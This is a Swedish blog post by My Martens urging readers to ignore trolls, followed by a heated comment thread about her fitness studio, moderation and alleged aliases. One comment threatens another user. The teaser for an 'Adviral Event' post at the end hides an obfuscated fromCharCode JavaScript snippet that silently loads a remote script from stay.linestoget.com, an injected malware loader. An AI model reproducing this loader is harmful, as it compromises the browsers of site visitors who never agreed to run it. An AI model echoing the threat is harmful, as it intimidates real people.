STRONG WOMAN, LIFT EACH OTHER UP ????? Krig i kommentarsfÀltet!??

BCDBDFEF-262C-4731-A088-272EA7B7E88E

STRONG WOMAN, LIFT EACH OTHER UP ????

AlltsÄ hey, hey hey!

Vad hĂ€nder bland mina kommentarer? ????‍♀ Vad Ă€r det för nivĂ„?! Jag Ă€r FÖR busy just nu, bpde privat & jobbmĂ€ssigt! Jag har inte haft en chans att hĂ€nga med!? sorry för detâŁïž
Ärligt, vad hĂ€nder? Jag tycker sĂ„Ă„Ă„Ă„ synd om alla er genuina lĂ€sare som behöver förpestas med den ena sjukare kommentaren Ă€n den andra ?

 Det mest komiska Ă€r samma personer har sĂ„ mĂ„nga olika ”alias” att det Ă€r svĂ„rt att hĂ„lla isĂ€r dom. FrĂ„n mitt & Admins hĂ„ll sĂ„ kan man klicka pĂ„ ip-nr för att se alla *hens kommentarer…., Men vet ni, jag tycker ni precis som jag ska ignorera! Det Ă€r ingen idĂ© att argumentera, eller ta en diskussion med troll som dessa! Jag Ă€r ledsen att jag inte svarar pĂ„ era övriga kommentar. Men just nu sĂ„ gĂ„r jag inte in bland kommentarerna. Dels för att det Ă€r rena rama sandlĂ„denivĂ„n just nu ? Men framförallt för att jag Ă€r busy pĂ„ annat hĂ„ll och i kombinationen med just det, sĂ„ hinner jag inte sitta och ”sortera” . Men snart Ă€r ordningen Ă„terstĂ€lld! SĂ„ fram tills dess…… -Kill them with kindness! Eller ignorera helt!

va faaaan, Ă€rligt! Vi borde stötta varandra, lyfta varandra och sprida HÄRLIG energi! ???? Lyft upp om nĂ„gon gjort nĂ„got bra, ge beröm, möt med ett extra leende â˜ș

VĂ„ga tex, ge en frĂ€mling en komplimang om du ser nĂ„got du vill uppmuntra! Dessa smĂ„ saker kan göra sĂ„Ă„Ă„ stor skillnad ❀

Livet Àr för kort för att ödsla pÄ massa onödiga saker som att brÄka i ett kommentarsfÀlt ??
/ My Martens

 

 

39 Komentarer

  1. Jag hÄller med!
    Det Àr vÀldigt lÄg nivÄ och utan respekt för varandra just nu i kommentarfÀltet.
    SÄ trÄkigt!
    Ja du har helt rĂ€tt i att ignorera eller ”kill them with kindness” Ă€r nog det bĂ€sta egentligen.
    Ibland Àr det dock svÄrt och man vill skriva nÄgonting, helst om nÄgot ligger en varmt om hjÀrtat..
    Att sÀga att det Àr djurplÄgeri att ha innekatt tex, dÄ vill man gÀrna skriva och diskutera nÀr man verkligen inte hÄller med och berÀtta vad man tycker om det. Det Àr ok att tycka olika och bra att diskutera, men inte kul nÀr det spÄrar ur.
    Trist att en del tror att det Àr ok att skriva vad som helst bÄde till den som har bloggen och de som lÀser/skriver.
    Ha det bra mitt i allt stök!
    Det kommer bli bra.

  2. Hoppas ni kan stoppa de otrevligheter som kommer frÄn ett och samma IP nummer. Jag gillade inte att bli omnÀmnd som ett av dessa alias. Jag skriver som den jag Àr och det vet du. HÄller inte alltid med i allt som skrivs och du vet att jag av nyfikenhet ibland stÀller frÄgor. som du vÀljer att svara eller inte svara pÄ men nÀr du svarar sÄ gör du det med heder och Àra.
    SÄ det behöver ingen annan göra Ät dig.
    Det har ju fullstĂ€ndigt ÖVERSVÄMMATS av ett litet antal signaturer som stĂ€llt till det ordentligt. Men dessa har synts pĂ„ andra bloggar och kanske Ă€r det för att det modereras pĂ„ vissa stĂ€llen som de istĂ€llet valt din blogg att slĂ€nga ur sig pĂ„.
    Hoppas det lugnar ner sig.

  3. Ja det Àr verkligen trist i kommentarsfÀltet. En tröst Àr ju att det ser ut sÄ pÄ mÄnga andra bloggar oxÄ ex Pernilla Wahlgrens blogg. Har man verkligen rÀtt att skriva vad som helst för att personen Àr kÀnd ? Vad Àr det för behov en del har att skriva nedlÄtande kommentarer? Det Àr för mig en gÄta o dessutom ta utav sin tid att gÄ in pÄ en blogg man inte gillar. Jag övervÀger om jag ska strunta i att lÀsa kommentarerna. Det ger ju ingen positiv energi precis.

  4. DÄ hoppas jag Moa försvinner, för om det Àr olika alias pÄ samma IP nummer Àr det inte jag heller för det kan du ocksÄ se My.
    Om man vill ha ett trevligt kommentarsfÀlt ska man kanske inte kalla folk för otrevliga saker, och inte förvanska kommentarer för att göra dom vÀrre.
    Du har medvetet lÄtit Moa vara otrevlig mot alla som stÀllt frÄgor till dig om rimliga saker, det vill jag gÀrna att du svarar pÄ varför du gjorde sÄ.

    • Om jag inte minns fel sĂ„ har vĂ€l my upprepade ggr skrivit att det inte gĂ„r att stoppa kommentarer hĂ€r pĂ„ bloggen? Jag kan ingenting om sĂ„nt hĂ€r men pĂ„ Hannah Graafs o en och annan blogg sĂ„ gĂ„r det ju att stoppa ?
      Jag hade gjort allt för att försöka fÄ bort trista kommentarer om de inte Àr konstruktiv kritik och det vet varje normal tÀnkande mÀnniska vad det innebÀr. Sen finns det mÀnniskor som Àr upprepande och tjatiga men dock ej otrevliga som ÀndÄ inte ger sig, vad ska man göra med dem? My kan ju inte annat Àn visa dÄ hon inte svarar dessa mÀnniskor att hen gÄr över grÀnsen. Det hjÀlper ju inte sÄ dem fÄr nog hÀnga hÀr ÀndÄ, va göra Ät dem liksom:/
      Vi fÄr vÀl se vad som hÀnder hÀr framöver. Hoppas de lugnar ner sig en aning. ?

    • Precis som en trasig LP-skiva hackas det om Moa…. Jisses, slĂ€pp det och gĂ„ vidare! Men antagligen Ă€r det en och annan som kĂ€nner sig trĂ€ffade av Moas kommentarer, som dessutom Ă€r vettiga, jĂ€mfört med de de fĂ„ stackare som svarar sina egna kommentarer, bara för att fĂ„ det att se ut som om det Ă€r mĂ„nga som hĂ„ller med……..
      Kan ni inte bara lÀgga ner?

  5. Och dĂ€r har du helt rĂ€tt My. Men det borde gĂ€lla Ă„t bĂ„da hĂ„llen. Kan vĂ€l ocksĂ„ hĂ„lla med om att tonerna ibland Ă€r lite vĂ€l. Men vi som tex bett om att fĂ„ mer info om tex Studion. DĂ€r fĂ„r vi aldrig svar/Ă„terkoppling. Och nĂ€r det bara kvĂ€vs i sin linda hela tiden. Och om vi fĂ„r nĂ„got slags svar sĂ„ Ă€r vi troll. Att du ocksĂ„ ber om feedback frĂ„n dina lĂ€sare för att sedan om dom/Vi gör det sĂ„ hamnar vi i troll facket igen. Även en liten slĂ€ng av drev ocksĂ„. Varför inte sluta be oss om feedback. Vips sĂ„ Ă€r ett problem borta. Sedan dom olika cliffhangers. Om jag ska vara riktigt Ă€rlig sĂ„ hĂ€r man tillslut glömt vad du skulle droppa eftersom man blir sĂ„ förvirrad. Sedan att vi kvinnor ska lyfta varandra. SjĂ€lvklart ska vi det. Men det handlar inte om att vi inte ska ifrĂ„gasĂ€tta och bara hĂ„lla med. Min frĂ„ga dĂ„ My.
    Lever du som du lÀr?

    • Jamen maja, det Ă€r ju precis detta jag menar med att gĂ„ng pĂ„ gĂ„ng fortsĂ€tta frĂ„ga my varför hon inte svarar ang cliffhangers studion osv . Hon har för lĂ€ngesedan slutat att svara ang detta. Antingen blir man sne och byter blogg pga besvikelse frĂ„n att inte fĂ„ svar. Eller sĂ„ bankar man pannan i vĂ€ggen för ingenting liksom.
      Att my kastat ut frÄgor till lÀsarna och sen inte besvarar dem Àr dÄligt, hÄller fullstÀndigt med. Men det jag inte förstÄr Àr varför man inte ger sig efter ett tag utan bara fortsÀtter o mala pÄ?
      Sen om jag inte minns fel sĂ„ har vĂ€l my svarar för ett tag sen pĂ„ frĂ„gor ang studion? MĂ„nga verkar inte förstĂ„ konceptet heller utan verkar tro att det Ă€r ett öppet gym man bara ska kunna knalla in i. Hon har förklarar detta mĂ„nga ggr och förstĂ„r nĂ„nstans att hon tröttnar…
      Jaja, nu har jag iaf en trött tumme?? mer kĂ€rlek Ă„t folket ❀

      • HĂ„ller med, mer kĂ€rlek Ă„t folket ❀ ( och ja…. jag har svarade övertydligt gĂ€llande studion ??‍♀?)

    • AlltsĂ„ Maja, ditt trĂ€ningsbehov verkar vara enormt stort och du verkar i det nĂ€rmaste vara desperat efter att fĂ„ veta öppethĂ„llningstiderna för Mys gym. Du kanske skulle prova ett annat gym under tiden du vĂ€ntar? Det finns vĂ€ldigt mĂ„nga vet du, och för dem som har ett vĂ€ldigt stort trĂ€ningsbehov sĂ„ finns det faktiskt de som Ă€r öppna 24/7. Bra va!?

        • Maja, det finns TRE maja hĂ€r inne?
          En Àr ett av trollen, som trakasserar, och Äterupprepat attackerar mig.
          OM, jag av misstag svarat dig, istĂ€llet för henne….. SĂ„ ber jag om ursĂ€kt för det.
          Men sanningen Àr att jag inte vill kommunicera ut mina tider via min blogg. Det kÀnns fel. Det Àr tyvÀrr sÄ pga av de troll som finns hÀr emellanÄt.
          Jag gav mina gamla pt-kunder första tjing, sedan mina ”stammisar” frĂ„n trĂ€ningsresorna.
          Jag har aldrig haft som ambition att ha kunder frÄn morgon till kvÀll.
          Detta Àr ett komplement till allt jag gör, friheten att kunna ha event, workshops med kollegor.
          Att kunna trÀffa mina pt-online kunder dÄ och dÄ.
          KostnadsmÀssigt behöver jag inte ha sÄ mycket som en enda kund för att gÄ runt. Studion anvÀnds Àven för fotografering och filmning till mitt och andras material.
          Jag Ă€r helt fullbokad som det Ă€r just nu….. DĂ€rför ser jag ingen anledning att skriva om den ?
          Jag har mÄnga jÀrn i elden, men jag har ÀndÄ nÄgonstans hittat min begrÀnsning. Jag har mina klienter. Vissa kör 1/dag veckan. Andra tvÄ.
          Detta i kombination med Lohilo, bloggen, resorna osv. Jag kan inte ta emot fler….. detta har jag skrivit sĂ„Ă„Ă„Ă„ lĂ„nga gĂ„nger.
          Men Ă€ndĂ„ fĂ„r jag svaret att jag svarar ”fel”. Att man inte kan respektera det jag skriver utan istĂ€llet fortsĂ€tta leta fel, insuinera pĂ„ konstiga saker…..
          Det Àr lÄngt ifrÄn alla Pt/ gym-Àgare som marknadsför sig genom sina sociala media kanaler, om dom ens har det.
          Kanske Ă€ndrar jag mig lĂ€ngre fram, kanske inte. Men just nu sĂ„ Ă€r jag fullbokad, och jag vĂ€ljer att inte blogga om konceptet mer Ă€n sĂ„… ?
          MEN, som sagt… har jag förvĂ€xlat dig med fel Moa, sĂ„ ber jag om ursĂ€kt för det!
          Kram kram / My Martens

        • Ja jösses Mollan. Vad sĂ€ger man. ?
          Vad ska vi schizofrena troll göra.?
          Jag tror vi kastar pÀrlor för svin. Eftersom i denna blogg vill hon inte ha nÄgon som frÄgar eller ifrÄgasÀtter. Tror inte heller bloggen blir mer spÀnnande Àn sÄ hÀr. Reklam och cliffhangers som vÀldigt sÀllan infrias. SÄÄÄÄÄÄÄ trÄÄÄÄÄÄkigt som My skulle sagt.
          Vi fÄr lÀsa via Bloggbevakning om det hÀnder nÄgot.
          Ha det bÀst Mollan.?
          Du skriver Ätminstone vad mÄnga kÀnner.

        • Är du göteborgare skithuvud? I sĂ„ fall sĂ„ kan jag en historia om dig.
          Törs inte ta den.

          • Du förstod inte heller innehĂ„llet i det My skrev i sitt inlĂ€gg, ditt beteende ”Anonym …..” nu Ă€r ju precis raka motsatsen. Göteborgare nej inte det heller inte mĂ„nga rĂ€tt du har idag.

          • VĂ€ldigt vĂ€ldigt att svĂ„rt att lĂ„ta bli, du kommer att bli hittad bara sĂ„ att du vet.
            Ditt elaka jÀkla Àckliga troll. Som du hÀrjat/hÀrjar hÀr. Din tid Àr rÀknad.,
            SĂ€g nĂ„t mer och jag lĂ€gger till det….

  6. Jag tycker dom som skriver elakt Àr sjuka. SÄ jag tÀnker inte lÀsa kommentarerna. Dom borde gÄ att blockeras. För ingen vill lÀsa deras skit. Ha det fint.

      • Den kommentaren reagerade du pĂ„. Men inte pĂ„ ”anonym för engĂ„ng skulls” inlĂ€gg och hot. DĂ€r borde du satt ner foten och kanske blockat eller tagit bort kommentaren. Men icke. Det Ă€r du My som lĂ€gger ribban pĂ„ din blogg. Kill the with kindness?????

        • Men maja, det fattar vĂ€l du oxĂ„ att det sitter en fjant nĂ„nstans och lĂ„tsas skrĂ€mmas? Hur ska denna som nu hotat dĂ„ veta vem mollan eller vad dom/hen Ă€r? Ingen rolig kommentar men kom igen…

          • Det dröjer nog med svar frĂ„n Moa/My/Anonym för en gĂ„ng skull, för det Ă€r My sjĂ€lv som skriver. Hon sitter ju pĂ„ flyget och hinner inte…
            Ribban pĂ„ klimatet pĂ„ denna blogg lĂ€gger My sjĂ€lv, hon vill ha lite brĂ„k och oro eftersom hon tjĂ€nar pĂ„ varje klick…

      • My, tror det Ă€r denna kommentar som Ă„syftas:
        ”Kris 7 oktober, 2019 on 00:52
        Lycka till med att landa pĂ„ en plats & med att fĂ„ bygga bo och komma in i en vardag som fungerar för dig & Ludwig.( förstĂ„r det kan vara utfodrande att byta skola etc men det kommer helt sĂ€kert gĂ„ vĂ€ldigt bra) En spĂ€nnande och fin höst ni gĂ„r i mötes.?”

  7. Tycker inte Du svarat pÄ frÄgor om studion. Va Àr webbadress sÄ man kan boka tider? SÄ My skriv inte att du svarat pÄ de. Bilder har vi önskat men nÀ de kommer inget. Du förstÄr vÀl att vi undrar??
    L

    • Jag har svarat, och nej det finns ingen webbadress dĂ€r du bokar ?
      Precis som jag skrivit innan, man mailar mig, eller nÄgon av kollegorna.
      Med vÀnlig hÀlsning, My

Svara

LĂ€mna din kommentar!
Ditt namn hÀr

Om du missat..

Andas ut stressen med hjÀlp av djupandning

Andas ut stressen med hjÀlp av djupandning -Hur mÄnga tÀnker egentligen pÄ sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej pĂ„ er! Detta Ă€r en grymt efterlĂ€ngtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/